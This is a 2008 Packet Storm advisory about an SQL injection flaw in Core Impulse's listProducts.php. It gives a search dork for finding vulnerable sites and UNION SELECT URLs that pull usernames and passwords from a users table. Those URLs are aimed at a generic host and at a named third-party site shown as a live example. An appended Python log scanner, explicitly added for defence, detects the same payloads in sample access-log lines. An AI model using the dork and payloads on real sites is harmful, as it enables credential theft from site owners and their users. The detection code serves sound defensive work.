core-sql.txt

2008-04-28T00:00:00
ID PACKETSTORM:65870
Type packetstorm
Reporter e.wiZz!
Modified 2008-04-28T00:00:00

Description

                                        
Core Impulse SQL Injection vulnerability  
******************************  
Vendor site: www.coreimpulse.com   
discovered by: e.wiZz!  
Dork: inurl:/products/listProducts.php?cat or inurl:listProducts.php?cat  
  
Exploit:  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/  
  
http://www.somesite.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
Example:  
  
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/*  
  
http://www.belgradetradecenter.com/products/listProducts.php?cat=-9999+UNION+ALL+SELECT+password,2,3+FROM+users/  
  
My blog: infected.blogger.ba  
  
visit: 50centshost.com/forum  
Info: this is pointless, but there you go, I feel like a noob :D  
  
Thanks 2: big thanks to my friend aluigi (aluigi.freeforums.org), QKrunix, F34r... I find them kind of interesting; thanks also to skillpak3r for making me laugh with his knowledge :D  
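
Detection side of the requests shown above, as an added example that is not part of the original advisory: the injected `cat` values are never plain category ids, so a scan of the web server access log can flag them even when they are URL-encoded or mixed-case. The log lines are constructed, and the rule that a legitimate `cat` value is a short non-negative integer is an assumption, not something the advisory or the vendor states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')
UNION_RE = re.compile(r"\bunion\b.+\bselect\b", re.IGNORECASE | re.DOTALL)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [28/Apr/2008:10:01:02 +0000] "GET /products/listProducts.php?cat=12 HTTP/1.1" 200 5120
198.51.100.7 - - [28/Apr/2008:10:03:40 +0000] "GET /products/listProducts.php?cat=-9999+UNION+ALL+SELECT+username,2,3+FROM+users/* HTTP/1.1" 200 2048
198.51.100.7 - - [28/Apr/2008:10:03:55 +0000] "GET /products/listProducts.php?cat=-9999%20uNiOn%20all%20sElEcT%20password,2,3%20from%20users HTTP/1.1" 200 2048
203.0.113.5 - - [28/Apr/2008:10:05:11 +0000] "GET /products/listProducts.php?cat=7%27 HTTP/1.1" 500 312
192.0.2.10 - - [28/Apr/2008:10:06:00 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 900
"""

def classify_cat(value):
    """Return None for a plain category id (assumed numeric), else a reason."""
    if re.fullmatch(r"[0-9]{1,9}", value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    return "non-numeric"

def scan(log_text):
    """Return a list of (client_ip, reason, decoded_cat) for suspicious hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Covers both paths named in the advisory's search string.
        if not url.path.lower().endswith("/listproducts.php"):
            continue
        # parse_qs decodes %xx and '+', so encoded payloads are checked in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get("cat", []):
            reason = classify_cat(value)
            if reason:
                findings.append((line.split()[0], reason, value))
    return findings

if __name__ == "__main__":
    for ip, reason, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value}")
```

A `non-numeric` hit with a 500 response, like the quote probe in the sample, is worth correlating with later `union-select` hits from the same client.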